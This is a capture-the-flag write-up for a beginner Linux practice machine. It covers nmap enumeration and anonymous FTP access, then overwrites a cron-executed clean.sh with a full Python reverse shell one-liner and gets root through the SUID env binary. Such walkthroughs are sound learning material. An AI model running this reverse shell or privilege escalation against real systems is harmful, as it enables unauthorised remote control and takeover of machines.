Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
First let’s start out with an Nmap scan to check for versions and also use standard enumeration scripts
nmap -sV -sC -oN version-scan 10.10.199.86
So we have the following services open: FTP on port 21with anonymous login allowed. SSH on port 22 and SMB on port 139/445.
This is a bit confusing as in one sense it is saying its a Windows machine and in the other a Linux Ubuntu machine. The SMB OS is showing Windows 6.1 (Samba 4.7.6 — Ubuntu). My initial assumption is that this is a Linux machine and the SMB Samba server is confusing Nmap.
Anyway, let’s start with the FTP server.
FTP Port 21:
As we know from the Nmap scan, the FTP service allows us to login as anonymous, so for the ‘name’ just type in ‘anonymous’ and hit return at the password prompt. let’s see what is on the FTP server:
Let’s download all the files from the /scripts directory for further enumeration using the ‘mget’ command.
The one that I am very interested in is the clean.sh file:
This is definitely being run as a cron job as we can see the output in the ‘removed_files.log’. If this is the case then we can simply change this file to run a reverse shell and connect back to a listener to gain a remote shell. To do this I will use a Python reverse shell and connect back to a Pwncat listener.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'I removed the clean.sh file and cleated a new one using vi and added the shell code to include my IP address and the port to listen on 4444. I then uploaded this to the FTP server using ‘put clean.sh clean.sh’, making sure that I launched the FTP server in the same directory that I created the new clean.sh file. I then launched the Pwncat listener and waited for the cron job to execute the clean.sh file.
We can now grab the user.txt file and move on to privesc. Before uploading any further enumeration scripts, I will use Pwncat’s internal enumeration scripts to start with. To do this enter a local shell using CTRL D and type ‘privesc -l’
Straight away we see we have a binary called env with the owner as root and the SUID bit set. We can probably exploit this to get shell as root as detailed in the enumeration above. Let’s take a look at env using GFTOBins:
As we cannot use sudo, we need to try the SUID option:
The env binary is located in /usr/bin, so we need to apply the above to that binary:
/usr/bin/env /bin/sh -p
Ignore all the strange text as this appears to be a glitch with Pwncat; however, we have our result and navigating to /root we can grab the root.txt.
With this box the SMB appeared to be a rabbit hole, although I enumerated this as below:
SMB (Samba) Port 139/445:
A quick smbmap scan showed us that we had read access to the pics share.
Using smbclient we can access this pics share, where there are two photos of cute dogs.
Downloading the two photos, I started to check for any stenography that may offer further information. To start I ran both files through strings, Exiftool, steghide and stegcracker, but could not find any further information. With the box rooted, I decided to end it here.
A big thank you to the namelessone for creating this fun box.
